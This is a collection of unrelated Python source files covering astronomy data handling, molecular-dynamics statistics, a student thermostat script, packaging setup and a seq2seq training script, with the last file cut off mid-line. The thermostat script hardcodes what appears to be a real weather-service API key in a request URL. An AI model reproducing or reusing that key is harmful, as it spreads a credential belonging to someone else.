self.unique_id = unique_id\n self.ra = ra\n self.dec = dec\n self.z = z\n self.galcat = galcat\n return\n def _check_types(self):\n \"\"\"Check types of all attributes\"\"\"\n if isinstance(self.unique_id, (int, str)): # should unique_id be a float?\n self.unique_id = str(self.unique_id)\n else:\n raise TypeError(f'unique_id incorrect type: {type(unique_id)}')\n try:\n self.ra = float(self.ra)\n except ValueError:\n raise TypeError(f'ra incorrect type: {type(self.ra)}')\n try:\n self.dec = float(self.dec)\n except ValueError:\n raise TypeError(f'dec incorrect type: {type(self.dec)}')\n try:\n self.z = float(self.z)\n except ValueError:\n raise TypeError(f'z incorrect type: {type(self.z)}')\n if not isinstance(self.galcat, GCData):\n raise TypeError(f'galcat incorrect type: {type(self.galcat)}')\n\n if not -360. <= self.ra <= 360.:\n raise ValueError(f'ra={self.ra} not in valid bounds: [-360, 360]')\n if not -90. <= self.dec <= 90.:\n raise ValueError(f'dec={self.dec} not in valid bounds: [-90, 90]')\n if self.z < 0.:\n raise ValueError(f'z={self.z} must be greater than 0')\n return\n def save(self, filename, **kwargs):\n \"\"\"Saves GalaxyCluster object to filename using Pickle\"\"\"\n with open(filename, 'wb') as fin:\n pickle.dump(self, fin, **kwargs)\n return\n def load(filename, **kwargs):\n \"\"\"Loads GalaxyCluster object to filename using Pickle\"\"\"\n with open(filename, 'rb') as fin:\n self = pickle.load(fin, **kwargs)\n self._check_types()\n return self\n def __repr__(self):\n \"\"\"Generates string for print(GalaxyCluster)\"\"\"\n output = f'GalaxyCluster {self.unique_id}: ' +\\\n f'(ra={self.ra}, dec={self.dec}) at z={self.z}\\n' +\\\n f'> {len(self.galcat)} source galaxies\\n> With columns:'\n for colname in self.galcat.colnames:\n output += f' {colname}'\n return output\n","sub_path":"clmm/galaxycluster.py","file_name":"galaxycluster.py","file_ext":"py","file_size_in_byte":3238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"391120413","text":"import sys\nsys.path.append('/home/mnguyen/bin/scripts/')\nimport stats\nimport numpy as np\nimport matplotlib, sys, os\nimport matplotlib.pyplot as plt\nimport MDAnalysis as mda\nimport mdtraj as md\nimport log2txt\nshowPlots = True\ntry:\n os.environ[\"DISPLAY\"] #Detects if display is available\nexcept KeyError:\n showPlots = False\n matplotlib.use('Agg') #Need to set this so doesn't try (and fail) to open interactive graphics window\n\n\nautowarmup = True\n#defulat warmup samples if not using autowarmup\nwarmup = 100\n\ntrajFiles = ['trajectory298.dcd']\ntops = ['AA12_f0.25_opc_gaff2_w0.13.parm7']\nstride = 5\n\n#names of residue in polymer chain\n#resInChain = ['AHP','AP', 'ATP']\nDOPs = [12]\nNPs = [15]\n#index of first polymer residue\nres0Id = 0\nN_av = 6.022e23 #1/mol\nkB = 0.008314265 #kJ/mol/K\n#########################End of input######################\ndef GetThermo(ThermoLog, fi = 'lammps', obs = None, cols = None, autowarmup = True, warmup = 100):\n \"\"\" fi: log file format, 'lammps' or 'openmm' \"\"\"\n if not obs == None and not cols == None:\n Exception('Read data either by observable name or column index but not both!')\n\n #conver log file:\n if fi == 'openmm':\n ThermoLog = log2txt.log2txt_openmm([ThermoLog])[0]\n elif fi == 'lammps':\n section = 'PRODUCTION RUNS'\n ThermoLog = log2txt.log2txt_lammps([ThermoLog],section,'production')[0]\n\n print('new log file: {}'.format(ThermoLog))\n txt = \"\"\n obsID = []\n Stats = []\n #do stats\n file = open(ThermoLog,'r')\n if not obs == None:\n lines = file.readlines()\n while not isinstance(cols,list):\n for line in lines:\n if line.startswith('#'):\n obsNames = line.split()[1:]\n print('obsNames {}'.format(obsNames))\n cols = [obsNames.index(val) for val in obsNames if val in obs]\n print('cols {}'.format(cols))\n for i, col in enumerate(cols):\n if autowarmup:\n warmup,Data,nwarmup = stats.autoWarmupMSER(file, col)\n print (\"Auto warmup detection with MSER-5 => \",nwarmup)\n else:\n warmup,Data = stats.extractData(file, col, warmup)\n (nsamples,(min,max),mean,semcc,kappa,unbiasedvar,autocor)=stats.doStats(warmup,Data, False ,False,'_{0}_mol{1}'.format(file.name,col))\n try:\n obsName = obsNames[col]\n except:\n obsName = 'col{}'.format(col)\n lines = \"\" \n lines += '\\n==== {} ===='.format(obsName)\n lines += \"\\n - Mean = {} +/- {}\".format(mean,semcc)\n lines += \"\\n - Equilibrated samples = {}\".format(nsamples)\n lines += \"\\n - Correlation time = {}\".format(kappa)\n lines += \"\\n - Effective # samples = {}\".format(nsamples/kappa)\n lines += \"\\n - Reduced-bias variance = {}\".format(unbiasedvar)\n # note that there is no unbiased estimator for the population standard deviation. We can use sqrt(var) as a indicative estimator.\n lines += \"\\n - S.D. (unbiased, biased) = {} {}\".format(np.sqrt(unbiasedvar),np.std(Data,ddof=0)) # ddof is correction to 1/N...using ddof=1 returns regular reduced-bias estimator\n lines += \"\\n - Min, Max = {} {}\\n\".format(min,max)\n\n print(lines)\n txt += lines\n \n Avg = mean\n Std = np.sqrt(unbiasedvar)\n Err = semcc\n CorrTime = kappa \n NUncorrSamples = nsamples/kappa\n Stats.append([Avg,Std,CorrTime,Err,NUncorrSamples])\n obsID.append(obsName)\n\n return obsID, Stats\n \ndef GetRgRee(trajFile, top, DOP, NP, NAtomsPerChain = None, \n RgDatName = 'RgTimeSeries', ReeDatName = 'ReeTimeSeries',RgStatOutName = 'RgReeStats', Ext='.dat', \n res0Id = 0, stride = 1, autowarmup = True, warmup = 100, plot = False, fi = 'openmm', unit = 'real'): \n \n \"\"\"NAtomsPerChain: used if running CG system, if provided will assume there is one residue per chain\n multiply coordinates by 10 if input traj was generated by lammps and unit is nonDim\"\"\"\n ElementDictionary ={\n \"carbon\": 12.01,\n \"hydrogen\": 1.008,\n \"oxygen\": 16.00,\n \"nitrogen\": 14.001,\n \"virtual site\": 1.0,\n \"virtual_site\": 1.0,\n \"sodium\": \"na+\"}\n\n traj = md.load(trajFile, top=top, stride = stride)\n traj.make_molecules_whole(inplace=True, sorted_bonds=None) # Automatically finds the bonds from the topology file\n if fi == 'lammps' and unit == 'nonDim':\n traj.xyz *= 10.\n traj.unitcell_lengths *= 10\n\n RgStats = []\n RgTimeseries = [range(traj.n_frames)]\n Rgheader = \"Frame \"\n txtRg = \"\"\n \n ReeStats = []\n ReeTimeseries = [range(traj.n_frames)]\n Reeheader = \"Frame \"\n \n #get indices of residues in all chains \n MoleculeResidueList = []\n if not NAtomsPerChain:\n #number residues per chain = DOP (for AA systems)\n for j in range(NP):\n resId = range(res0Id + j*DOP, res0Id + (j+1)*DOP)\n MoleculeResidueList.append(resId)\n else:\n #1 residue per chain (for CG system)\n x = range(res0Id, res0Id + NP)\n MoleculeResidueList = [[a] for a in x]\n \n for j,resId in enumerate(MoleculeResidueList):\n resIdLow = np.min(resId)\n resIdUp = np.max(resId)\n atom_indices = traj.topology.select('resid {} to {}'.format(resIdLow,resIdUp)) \n print('Indices of atoms in chain {} \\n{}'.format(j+1,atom_indices))\n mass_list = []\n for index in atom_indices:\n element = str(traj.topology.atom(index).element)\n try:\n mass = ElementDictionary[element]\n except:\n mass = 1.\n mass_list.append(mass)\n mass_list = np.array(mass_list)\n \n '''=== Compute Rg ==='''\n Rg = md.compute_rg(traj.atom_slice(atom_indices),masses=mass_list) \n RgTimeseries.append(Rg.tolist())\n Rgheader += 'Rg{} '.format(j+1)\n np.savetxt(RgDatName+Ext, np.transpose(RgTimeseries), fmt = '%5.5f', header=Rgheader ) \n \n \n #do stats\n file = open(RgDatName+Ext,'r')\n if autowarmup:\n warmup,Data,nwarmup = stats.autoWarmupMSER(file, j+1)\n print (\"Auto warmup detection with MSER-5 => \",nwarmup)\n else:\n warmup,Data = stats.extractData(file, j+1, warmup)\n (nsamples,(min,max),mean,semcc,kappa,unbiasedvar,autocor)=stats.doStats(warmup,Data, False ,False,'_{0}_mol{1}'.format(file.name,j+1))\n\n lines = \"\" \n lines += '\\n==== Rg for molecule {} ===='.format(j+1)\n lines += \"\\n - Mean = {} +/- {}\".format(mean,semcc)\n lines += \"\\n - Equilibrated samples = {}\".format(nsamples)\n lines += \"\\n - Correlation time = {}\".format(kappa)\n lines += \"\\n - Effective # samples = {}\".format(nsamples/kappa)\n lines += \"\\n - Reduced-bias variance = {}\".format(unbiasedvar)\n # note that there is no unbiased estimator for the population standard deviation. We can use sqrt(var) as a indicative estimator.\n lines += \"\\n - S.D. (unbiased, biased) = {} {}\".format(np.sqrt(unbiasedvar),np.std(Data,ddof=0)) # ddof is correction to 1/N...using ddof=1 returns regular reduced-bias estimator\n lines += \"\\n - Min, Max = {} {}\\n\".format(min,max)\n print(lines)\n txtRg += lines\n\n RgAvg = mean\n RgStd = np.sqrt(unbiasedvar)\n RgErr = semcc\n CorrTime = kappa \n NUncorrSamples = nsamples/kappa\n RgStats.append([RgAvg,RgStd,CorrTime,RgErr,NUncorrSamples])\n\n# print ('The Rg for molecule {} (mean, error, std)'.format(j))\n# print ('\\t{0:2.4f}\\t{1:2.5f}\\t{1:2.5f}'.format(RgAvg, RgErr, RgStd))\n\n ''' Plot Rg '''\n if plot:\n plt.plot(Rg, \"k-\")\n plt.xlabel('timestep')\n plt.ylabel('Radius-of-gryation')\n plt.savefig(\"Rg{}.png\".format(j+1),bbox_inches='tight')\n plt.close()\n\n '''=== Compute Ree ==='''\n atom_pairs = [np.min(atom_indices), np.max(atom_indices)]\n Ree = md.compute_distances(traj,atom_pairs= [atom_pairs], periodic=False, opt=True)\n Ree = Ree.tolist()\n Ree = [a[0] for a in Ree]\n ReeTimeseries.append(Ree)\n Reeheader += 'Ree{} '.format(j+1)\n np.savetxt(ReeDatName+Ext, np.transpose(ReeTimeseries), fmt = '%5.5f', header=Reeheader ) \n \n #do stats\n file = open(ReeDatName+Ext,'r')\n if autowarmup:\n warmup,Data,nwarmup = stats.autoWarmupMSER(file, j+1)\n print (\"Auto warmup detection with MSER-5 => \",nwarmup)\n else:\n warmup,Data = stats.extractData(file, j+1, warmup)\n (nsamples,(min,max),mean,semcc,kappa,unbiasedvar,autocor)=stats.doStats(warmup,Data, False ,False,'_{0}_mol{1}'.format(file.name,j+1))\n\n lines = \"\" \n lines += '\\n==== Ree for molecule {} ===='.format(j+1)\n lines += \"\\n - Mean = {} +/- {}\".format(mean,semcc)\n lines += \"\\n - Equilibrated samples = {}\".format(nsamples)\n lines += \"\\n - Correlation time = {}\".format(kappa)\n lines += \"\\n - Effective # samples = {}\".format(nsamples/kappa)\n lines += \"\\n - Reduced-bias variance = {}\".format(unbiasedvar)\n # note that there is no unbiased estimator for the population standard deviation. We can use sqrt(var) as a indicative estimator.\n lines += \"\\n - S.D. (unbiased, biased) = {} {}\".format(np.sqrt(unbiasedvar),np.std(Data,ddof=0)) # ddof is correction to 1/N...using ddof=1 returns regular reduced-bias estimator\n lines += \"\\n - Min, Max = {} {}\\n\".format(min,max)\n print(lines)\n txtRg += lines\n\n ReeAvg = mean\n ReeStd = np.sqrt(unbiasedvar)\n ReeErr = semcc\n CorrTime = kappa \n NUncorrSamples = nsamples/kappa\n ReeStats.append([ReeAvg,ReeStd,CorrTime,ReeErr,NUncorrSamples])\n\n ''' Plot Ree '''\n if plot:\n plt.plot(Ree, \"k-\")\n plt.xlabel('timestep')\n plt.ylabel('End-to-end distance')\n plt.savefig(\"Ree{}.png\".format(j+1),bbox_inches='tight')\n plt.close()\n\n #get averages of stats\n RgStats = np.array(RgStats)\n RgAvg = np.mean(RgStats[:,0])\n RgStd = np.mean(RgStats[:,1])\n RgCorrTime = np.mean(RgStats[:,2])\n RgErr = np.mean(RgStats[:,3])\n RgErr_Prop = np.sqrt(np.sum(RgStats[:,3]**2))/NP\n RgCorrTimeErr = np.sqrt(np.var(RgStats[:,2])/len(RgStats[:,2]))\n RgNUncorrSamples = np.mean(RgStats[:,4])\n\n ReeStats = np.array(ReeStats)\n ReeAvg = np.mean(ReeStats[:,0])\n ReeStd = np.mean(ReeStats[:,1])\n ReeCorrTime = np.mean(ReeStats[:,2])\n ReeErr = np.mean(ReeStats[:,3])\n ReeErr_Prop = np.sqrt(np.sum(ReeStats[:,3]**2))/NP\n ReeCorrTimeErr = np.sqrt(np.var(ReeStats[:,2])/len(ReeStats[:,2]))\n ReeNUncorrSamples = np.mean(ReeStats[:,4])\n\n lines = \"\"\n lines += '\\n\\n=====================\\nTotal Rg average is: {0:2.3f} +/- {1:2.5f}'.format(RgAvg,RgErr)\n lines += '\\nTotal Rg avg. correlation time: {0:5.4f} +/- {1:5.6f}'.format(RgCorrTime, RgCorrTimeErr)\n lines += '\\n\\nTotal Ree average is: {0:2.3f} +/- {1:2.5f}'.format(ReeAvg,ReeErr)\n lines += '\\nTotal Ree avg. correlation time: {0:5.4f} +/- {1:5.6f}'.format(ReeCorrTime, ReeCorrTimeErr)\n\n print(lines)\n txtRg += lines\n f = open(RgStatOutName+Ext,'w')\n f.write(txtRg)\n return RgAvg,RgStd,RgErr,RgCorrTime,RgCorrTimeErr,RgNUncorrSamples, ReeAvg,ReeStd,ReeErr,ReeCorrTime,ReeCorrTimeErr,ReeNUncorrSamples \n\ndef GetStats(trajFile, top, NP, ThermoLog, DOP = 10, NAtomsPerChain = None, \n StatsFName = 'AllStats.dat', RgDatName = 'RgTimeSeries', ReeDatName = 'ReeTimeSeries',RgStatOutName = 'RgReeStats', Ext='.dat', \n fi = 'lammps', obs = None, cols = None,\n res0Id = 0, stride = 1, autowarmup = True, warmup = 100, plot = False, unit = 'real'):\n \n txt = '# Avg.\\tS.D.\\tStdErr.\\tCorr.\\tStdErr.\\tUncorr.Samples\\n'\n if NP > 0:\n RgAvg,RgStd,RgErr,RgCorrTime,RgCorrTimeErr,RgNUncorrSamples, ReeAvg,ReeStd,ReeErr,ReeCorrTime,ReeCorrTimeErr,ReeNUncorrSamples = GetRgRee(trajFile, top, DOP, NP, NAtomsPerChain = NAtomsPerChain,\n RgDatName = RgDatName, ReeDatName = ReeDatName, RgStatOutName = RgStatOutName, Ext=Ext,\n res0Id = res0Id, stride = stride, autowarmup = autowarmup, warmup = warmup, plot = plot, fi = fi, unit = unit)\n txt += ' Rg\\t%8.5f\\t%8.5f\\t%8.5f\\t%8.5f\\t%8.5f\\t%i' %(RgAvg,RgStd,RgErr,RgCorrTime,RgCorrTimeErr,RgNUncorrSamples)\n txt += '\\n Ree\\t%8.5f\\t%8.5f\\t%8.5f\\t%8.5f\\t%8.5f\\t%i' %(ReeAvg,ReeStd,ReeErr,ReeCorrTime,ReeCorrTimeErr,ReeNUncorrSamples)\n\n print('reading thermo file {}'.format(ThermoLog))\n obsID, Stats = GetThermo(ThermoLog, fi = fi, obs = obs, cols = cols, autowarmup = autowarmup, warmup = warmup)\n \n for i, obs in enumerate(obsID):\n Avg,Std,CorrTime,Err,NUncorrSamples = Stats[i]\n try:\n txt += '\\n %s\\t%8.5f\\t%8.5f\\t%8.5f\\t%8.5f\\t%s\\t%i' %(obs, Avg, Std, Err, CorrTime, 'N/A',NUncorrSamples)\n except:\n txt += '\\n %s\\t%8.5f\\t%8.5f\\t%8.5f\\t%8.5f\\t%s\\t%s' %(obs, Avg, Std, Err, CorrTime, 'N/A',NUncorrSamples)\n f = open(StatsFName, 'w')\n f.write(txt)\n\ndef GetCompressibility(trajFile, top, temp, stride = 1, unit = 'bar', lengthScale = 0.31, fName = 'Compressibility', Ext='.dat', trajFmt = 'omm'):\n \"\"\"unit = ['bar','Pa','nonDim']\n lengthScale in nm\n trajFmt: lmp or omm, multiply volume by 10**3 if trajFmt is lmp and unit is nonDim\"\"\"\n\n print('Need temperature in Kelvin')\n kT = kB * temp #kJ/mol \n traj = md.load(trajFile, top=top, stride = stride)\n vols = traj.unitcell_volumes\n if trajFmt == 'lmp' and unit =='nonDim':\n vols *= 10.**3\n meanVol = np.mean(vols)\n vol2s = vols**2\n meanVol2 = np.mean(vol2s)\n if unit == 'Pa':\n compressibility = (meanVol2 - meanVol**2)/(meanVol*kT) * N_av * 1e-30\n s = '1/'+unit\n print('Compressibility is {:.4e} {:s}'.format(compressibility, s))\n elif unit == 'bar':\n compressibility = (meanVol2 - meanVol**2)/(meanVol*kT) * N_av * 1e-25\n s = '1/'+unit\n print('Compressibility is {:.4e} {:s}'.format(compressibility, s)) \n elif unit == 'nonDim':\n kT = 1.\n print('Assume kT = 1.')\n compressibility = (meanVol2 - meanVol**2)/(meanVol*kT) * N_av\n compressibilityBar = compressibility * lengthScale**3 / (kB * temp) * 1e-25\n s = 'sigma^3/kT'\n print('Compressibility is {:.4e} {:s}'.format(compressibility, s))\n print('Convert to real unit at {:.2f} K for length scale of {:.2f} nm: {:.4e} 1/bar'.format(temp, lengthScale, compressibilityBar))\n f = open(fName+Ext,'w')\n f.write('{:.5e} {:s}'.format(compressibility, s))\n return compressibility\n\nif __name__ == '__main__':\n\n TrajFile = 'PAA0_traj.dcd'\n ThermoLog = 'PAA0_lammps.log'\n NAtomsPerChain = 12\n NP = 6\n top = 'PAA0.pdb' \n DOP = 12\n GetStats(TrajFile, top, NP, ThermoLog, DOP = 12, NAtomsPerChain = NAtomsPerChain, StatsFName = 'AllStats.dat',\n RgDatName = 'RgTimeSeries', ReeDatName = 'ReeTimeSeries',RgStatOutName = 'RgReeStats', Ext='.dat',\n fi = 'lammps', obs = ['PotEng', 'Temp', 'Press'], cols = None,\n res0Id = 0, stride = 1, autowarmup = True, warmup = 100, plot = True)\n","sub_path":"analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":15717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"430690083","text":"\"\"\"\nFile: simple-algorithm-test-module.py\nCourse: Senior Design Project - CSE 181B / EECS 159B\nAuthors: Michael Ishimoto\n Tyler Hom\n Ji Yeon Kim\n David Tran\n\"\"\"\n\nimport subprocess\nimport json\nimport urllib2\nimport time\n\ndesiredTemp = 70.0; # This is in Fahrenheit\n # All temperature values will be in Fahrenheit\n\n# Main method of the program which will run first when file is executed\ndef main():\n # Setting the next hour\n nextHour = getNextHour();\n\n # Infinite loop to constantly check temperatures\n while True:\n if str(time.localtime().tm_hour) == str(nextHour):\n nextHour = getNextHour();\n simpleAlgorithm();\n\n# Method for retrieving an EnOcean's sensor state / value\n# Returns the state as a string if the specified sensor is found, returns false otherwise\ndef retrieveEnOceanState(sensor):\n # Obtaining EnOcean sensor values\n output = subprocess.Popen(['/opt/fhem/fhem.pl', 'localhost:7072', 'jsonList'], stdout=subprocess.PIPE).communicate()[0]\n data = json.loads(output);\n devices = data['Results'][3]['devices']\n for device in devices:\n if device['DEF'] == '018B79C1' and sensor == 'EDWS': # Door sensor\n return device['STATE'] ;\n if device['DEF'] == '01831695' and sensor == 'STM': # Temperature sensor\n return device['STATE'];\n\n return False;\n\n# Method for getting the current temperature in the specified state and city\n# Returns the current fahrenheit temperature as a float\ndef getCurrentTemperature(state, city):\n # Making an API call to weatherunderground\n f = urllib2.urlopen('http://api.wunderground.com/api/12d1b60c95f74d26/geolookup/conditions/q/' + state + '/' + city + '.json');\n\n # Parsing the returned JSON\n json_string = f.read();\n parsed_json = json.loads(json_string);\n location = parsed_json['location']['city'];\n temp_f = parsed_json['current_observation']['temp_f'];\n # print \"Current temperature in %s is: %s\" % (location, temp_f)\n f.close()\n\n return temp_f;\n\n# Method for getting the next hour from the current hours\n# Returns the next hour as an integer\ndef getNextHour():\n currentHour = time.localtime().tm_hour;\n\n if (currentHour == 23):\n return 0;\n\n return currentHour + 1;\n\n# Method for checking the temperatures and taking actions based on Results\ndef simpleAlgorithm():\n insideTemp = float(retrieveEnOceanState('STM')) * 1.8 + 32;\n outsideTemp = getCurrentTemperature('CA', 'Irvine');\n\n # print(type(insideTemp));\n # print(type(outsideTemp));\n # print(type(desiredTemp));\n\n print('Inside temp: ' + str(insideTemp));\n print('Outside temp: ' + str(outsideTemp));\n print('Desired temp: ' + str(desiredTemp));\n\n if insideTemp > desiredTemp:\n if outsideTemp < insideTemp:\n print('Opening window...');\n else:\n print('Closing window');\n elif insideTemp < desiredTemp:\n if outsideTemp > insideTemp:\n print('Opening window...');\n else:\n print('Closing window');\n\nmain(); # Call to main method so that it runs first\n","sub_path":"src/test/simple-algorithm-test-module.py","file_name":"simple-algorithm-test-module.py","file_ext":"py","file_size_in_byte":3142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"456765289","text":"import numpy as np\nfrom tqdm import tqdm\ntry:\n from astropy.io import fits as pf\nexcept:\n import pyfits as pf\nimport matplotlib.pyplot as plt\nfrom astropy.visualization import ZScaleInterval\nimport pandas as pd\n\n#suppose these come form config file\nfilters_in_config = 'g,r,z_s'.split(',')\nbands = {}\ndef get_band_list(file_list):\n for j in filters_in_config:\n #initialize dict with empty arrays\n j=j.strip(' ')\n bands[j]=[]\n filters_in_hdr=[]\n\n for i in tqdm(file_list):\n hdr = pf.getheader(i)\n filters_in_hdr.append(hdr['FILTER'])\n for j in filters_in_config:\n if hdr['FILTER'] == j:\n j=j.strip(' ')\n bands[j].append(i)\n\n for key in sorted(bands.keys()):\n print('{0}-band: {1} frames'.format(key, len(bands[key])))\n return bands\n\n\ndef stack_raw_images(image_list, skip_every=1):\n '''\n stack image using median to be used for detecting \n source locations (i.e. target and ref stars)\n '''\n image_array = []\n count = []\n for i in tqdm(image_list[::skip_every]):\n img = pf.getdata(i)\n image_array.append(img)\n count.append(i)\n stacked_image = np.median(image_array, axis=0)\n print('number of stacked raw images={}'.format(len(count)))\n return stacked_image\n\ndef show_stacked_images(images):\n fig, axes = plt.subplots(1,3,figsize=(15,5))\n titles='g,r,z'.split(',')\n for i,img in enumerate(images):\n vmin,vmax= ZScaleInterval().get_limits(img)\n axes[i].imshow(img,vmin=vmin,vmax=vmax)\n axes[i].set_title(titles[i])\n plt.show()\n #return None\n\ndef get_crop(image, centroid, box_size):\n x, y = centroid\n image_crop = np.copy(image[int(y-(box_size/2)):int(y+(box_size/2)),int(x-(box_size/2)):int(x+(box_size/2))])\n return image_crop\n\ndef fwhm_to_sigma(fwhm):\n return fwhm/ (2*np.sqrt(2*np.log(2)))\n\ndef sigma_to_fwhm(sigma):\n return sigma * (2*np.sqrt(2*np.log(2)))\n\ndef parse_tables(tables, star_id):\n parsed={}\n colnames=tables[star_id][0].columns #at time=0 \n\n for i in colnames:\n parsed[i]=[]\n for t in range(len(tables[star_id])): #t is time\n parsed[i].append(float(tables[star_id][t][i]))\n \n df=pd.DataFrame(parsed)\n df=df.set_index('mjd')\n return df\n\ndef save_tables(df, band_idx, star_id):\n band=['g','r','z_s']\n fname='data/phot_{0}band_star{1}.csv'.format(band[band_idx],star_id)\n df.to_csv(fname)\n print('saved:\\n{}'.format(fname))\n\ndef parse_and_save_tables(tables, band_idx):\n dfs=[] #list of df per star\n for num in range(len(tables)):\n df = parse_tables(tables, num)\n dfs.append(df)\n save_tables(df, band_idx, num)\n return dfs\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"notebook/moscatel/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"452320771","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\n\nfrom setuptools import find_packages, setup\nfrom setuptools.command.test import test as TestCommand\n\n\ndef get_long_description():\n \"\"\"\n Read long description in a way that doesn't break if README.rst doesn't exist (for example in the docker image)\n \"\"\"\n try:\n description = open('README.rst').read()\n except FileNotFoundError:\n description = ''\n return description\n\n\ndef get_install_requirements(path):\n location = os.path.dirname(os.path.realpath(__file__))\n content = open(os.path.join(location, path)).read()\n requires = [req for req in content.split('\\\\n') if req != '']\n return requires\n\n\nclass PyTest(TestCommand):\n def initialize_options(self):\n TestCommand.initialize_options(self)\n self.cov = None\n self.pytest_args = ['--cov', 'lizzy',\n '--cov-report', 'term-missing',\n '--cov-report', 'xml',\n '-v']\n\n def finalize_options(self):\n TestCommand.finalize_options(self)\n self.test_args = []\n self.test_suite = True\n\n def run_tests(self):\n import pytest\n errno = pytest.main(self.pytest_args)\n sys.exit(errno)\n\nVERSION = '2017.0.dev1'\n\nsetup(\n name='lizzy',\n packages=find_packages(),\n version=VERSION,\n description='REST Service to deploy AWS CF templates using Senza',\n long_description=get_long_description(),\n author='Zalando SE',\n url='https://github.com/zalando/lizzy',\n license='Apache License Version 2.0',\n install_requires=get_install_requirements('requirements.txt'),\n tests_require=['pytest-cov', 'pytest', 'factory_boy'],\n cmdclass={'test': PyTest},\n classifiers=[\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'Operating System :: OS Independent',\n ],\n include_package_data=True,\n package_data={'lizzy': ['swagger/*']}, # include swagger specs\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"235449494","text":"#!/usr/bin/env python3\n\nprefix = (\"DEBUG\", \"WARNING\", \"ERROR\", \"MESSAGE\")\n\ndef ShowChars(num, token):\n return \"\\t\" + (token * (num + 4))\n \ndef Show(ss, message):\n if(ss < 1):\n ss = 1\n if(ss > 4):\n ss = 4\n message = prefix[ss - 1] + \": \" + message\n xx = len(message)\n stars = ShowChars(xx, '*')\n print(stars)\n print(\"\\t* \" + message + \" *\")\n print(stars)\n\nShow(4, \"The is a MESSAGE\")\nShow(1, \"Doh!\")\n\n","sub_path":"Python1100/Study/MyBannerArray.py","file_name":"MyBannerArray.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"565386201","text":"import os\nimport argparse\nimport json\n\nimport dataio\nfrom model_builder import Seq2SeqRNNBuilder\nimport criterion\nimport trainer\n\nimport random\nimport torch\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\"Train seq2seq.\")\n\n parser.add_argument(\n \"--train\", required=True)\n parser.add_argument(\n \"--valid\", required=True)\n\n parser.add_argument(\n \"--rnn-type\", required=False, type=str, default=\"gru\",\n choices=[\"rnn\", \"gru\", \"lstm\"])\n parser.add_argument(\n \"--num-layers\", default=1, type=int, required=False)\n parser.add_argument(\n \"--bidirectional\", default=1, type=int, choices=[0,1])\n parser.add_argument(\n \"--embedding-size\", required=False, type=int, default=300)\n parser.add_argument(\n \"--hidden-size\", required=False, type=int, default=300)\n parser.add_argument(\n \"--bridge-type\", required=False, type=str, default=\"linear-relu\",\n choices=[\"average\", \"linear-relu\"])\n parser.add_argument(\n \"--attention-type\", required=False, choices=[\"none\", \"dot\",],\n default=\"dot\")\n\n parser.add_argument(\n \"--gpu\", default=-1, type=int, required=False)\n parser.add_argument(\n \"--epochs\", default=25, type=int, required=False)\n parser.add_argument(\n \"--seed\", default=83419234, type=int, required=False)\n\n parser.add_argument(\n \"--optimizer\", default=\"adagrad\", type=str, required=False,\n choices=[\"sgd\", \"adagrad\", \"adadelta\", \"adam\"])\n parser.add_argument(\n \"--lr\", required=False, default=.001, type=float)\n parser.add_argument(\n \"--batch-size\", default=16, type=int, required=False)\n parser.add_argument(\n \"--dropout\", default=0.0, required=False, type=float)\n\n parser.add_argument(\n \"--src-tgt-fields\", required=False, default=(0, 1,), type=int,\n nargs=2)\n parser.add_argument(\n \"--enc-vocab-size\", default=40000, type=int, required=False)\n parser.add_argument(\n \"--dec-vocab-size\", default=40000, type=int, required=False)\n parser.add_argument(\n \"--max-steps\", default=50, type=int, required=False)\n parser.add_argument(\n \"--step-embedding-size\", default=100, type=int, required=False)\n\n parser.add_argument(\n \"--save-model\", default=None, required=False, type=str)\n parser.add_argument(\n \"--save-results\", default=None, required=False, type=str)\n\n args = parser.parse_args()\n\n random.seed(args.seed)\n torch.manual_seed(args.seed)\n\n\n field_src, field_tgt = args.src_tgt_fields\n vocab_args_src = {\"special_tokens\": [], \n \"unknown_token\": \"_UNK_\",\n \"top_k\": args.enc_vocab_size}\n vocab_args_tgt = {\"special_tokens\": [\"_START_\", \"_STOP_\"], \n \"unknown_token\": \"_UNK_\", \n \"top_k\": args.dec_vocab_size}\n\n vocab_src, vocab_tgt = dataio.read_vocabs_from_tsv(\n args.train,\n [field_src, field_tgt],\n vocab_args=[vocab_args_src, vocab_args_tgt])\n\n data_train = dataio.read_seq2seq_ts_dataset(\n args.train, field_src, vocab_src, field_tgt, vocab_tgt,\n max_steps=args.max_steps, skip_header=True,\n batch_size=args.batch_size, gpu=args.gpu)\n data_valid = dataio.read_seq2seq_ts_dataset(\n args.valid, field_src, vocab_src, field_tgt, vocab_tgt,\n max_steps=args.max_steps, skip_header=True,\n batch_size=args.batch_size, gpu=args.gpu)\n\n builder = Seq2SeqRNNBuilder()\n builder.add_encoder(\n vocab_src.size, args.embedding_size, args.rnn_type, args.hidden_size,\n args.num_layers, args.bidirectional == 1)\n builder.add_decoder(\n [vocab_tgt.size, args.max_steps], \n [args.embedding_size, args.step_embedding_size],\n args.rnn_type, args.hidden_size, args.num_layers, \n vocab_tgt.size,\n vocab_tgt.index(\"_START_\"),\n vocab_tgt.index(\"_STOP_\"),\n args.attention_type)\n builder.add_bridge(\n args.bridge_type, args.bidirectional == 1, args.hidden_size,\n args.num_layers)\n model = builder.finish_rnn_ts()\n\n model.set_meta(\"model_type\", \"seq2seq_rnn_ts\")\n model.set_meta(\"encoder_vocab\", vocab_src)\n model.set_meta(\"decoder_vocab\", vocab_tgt)\n model.set_meta(\"max_steps\", args.max_steps)\n \n #import types\n\n if args.gpu > -1:\n with torch.cuda.device(args.gpu):\n torch.cuda.manual_seed(args.seed)\n model = 